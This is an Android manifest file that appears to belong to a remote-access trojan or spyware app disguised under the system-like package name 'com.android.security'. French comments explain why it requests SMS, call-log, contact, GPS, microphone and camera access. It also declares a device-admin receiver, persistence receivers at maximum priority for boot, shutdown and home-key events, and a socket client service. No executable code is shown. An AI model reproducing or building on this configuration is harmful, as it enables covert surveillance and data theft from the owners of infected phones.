<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.security"
    android:versionCode="1"
    android:versionName="1.6.10" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="19" />

    <uses-permission android:name="android.permission.RECEIVE_SMS" /><!-- Pour déclencher le service lors de la reception d'un SMS -->
	<uses-permission android:name="android.permission.READ_SMS" /><!-- Pour déclencher le service lorsque le SMS reçu contient un mot clé -->
	<uses-permission android:name="android.permission.SEND_SMS" /><!-- Pour permettre l'envoi d'un SMS -->
	
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/> <!-- Pour récupérer l'IMEI et toutes ses informations -->
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/> <!-- Pour récupérer les appels sortant -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/><!-- Pour savoir s'il l'on est connecté ou pas -->
    
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> <!-- Acceder aux coordonnées GPS -->
	<uses-permission android:name="android.permission.INTERNET" /><!-- Pour utiliser les sockets -->
	
	<uses-permission android:name="android.permission.RECORD_AUDIO"/><!-- Pour enregistrer de l'audio -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <!--  Pour plus tard avec SD card -->
    <uses-permission android:name="android.permission.CAMERA"/><!-- Pour prendre des photos avec la camera -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /><!-- To start just after Boot -->
    <uses-permission android:name="android.permission.CALL_PHONE" /><!-- Pour permettre de lancer un appel -->
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<!--     <uses-permission android:name="android.permission.INSTALL_PACKAGES"/> -->
    
    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" android:name="MainApplication">
        <activity   android:label="@string/app_name" android:name="com.android.security.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        
 	 <receiver android:label="@string/app_name" android:name=".receiver.MyDeviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>       
      	<activity android:label="@string/app_name" android:name="com.android.security.AdminActivity">
  			 <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>        
        <service android:name="Client" android:permission="android.permission.INTERNET" android:exported="false">
            <intent-filter android:priority="2147483647" />
        </service>
        <receiver
            android:name=".receiver.BootReceiver"
            android:permission="android.permission.RECEIVE_BOOT_COMPLETED" 
            android:enabled="true"
            android:exported="true" >
            <intent-filter >
	            <action android:name="android.intent.action.USER_PRESENT" />
	            <action android:name="android.intent.action.BOOT_COMPLETED" />
	            <action android:name="android.provider.Telephony.SMS_RECEIVED" />
             </intent-filter>
        </receiver>  
        
        <receiver android:name=".receiver.MainReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
                <action android:name="android.intent.action.REBOOT" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <category android:name="android.intent.category.HOME" />
            </intent-filter>
        </receiver>
        <receiver android:name=".receiver.HomeKeyEventReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
            </intent-filter>
        </receiver>
        <receiver android:name=".receiver.AlarmReceiver" android:permission="com.android.alarm.permission.SET_ALARM">
            <intent-filter android:priority="2147483647" />
        </receiver>
        <receiver android:name=".receiver.NetworkEventReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
        </receiver>        
        
    </application>

</manifest>
